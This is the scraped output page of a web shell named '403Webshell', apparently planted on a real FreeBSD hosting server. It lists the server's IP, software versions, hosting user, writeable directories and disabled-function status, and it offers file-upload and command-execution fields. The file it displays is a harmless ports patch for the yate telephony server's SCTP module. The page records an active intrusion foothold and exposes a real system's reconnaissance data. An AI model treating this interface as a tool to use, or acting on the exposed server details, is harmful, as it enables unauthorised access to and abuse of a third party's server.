403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.217.33
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/net/yate/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/net/yate/files/patch-modules_server_lksctp.cpp
--- modules/server/lksctp.cpp.orig	2018-08-30 14:23:27 UTC
+++ modules/server/lksctp.cpp
@@ -521,9 +521,10 @@ bool LKSocket::alive() const
 		    status.sstat_primary.spinfo_state);
 	    }
     }
-    static int s_lastSstatState = SCTP_EMPTY;
+    //static int s_lastSstatState = SCTP_EMPTY;
+    static int s_lastSstatState = SCTP_CLOSED;
     switch (status.sstat_state) {
-	MAKE_CASE(EMPTY,Association);
+	//MAKE_CASE(EMPTY,Association);
 	MAKE_CASE(CLOSED,Association);
 	MAKE_CASE(COOKIE_WAIT,Association);
 	MAKE_CASE(COOKIE_ECHOED,Association);

Youez - 2016 - github.com/yon3zu
LinuXploit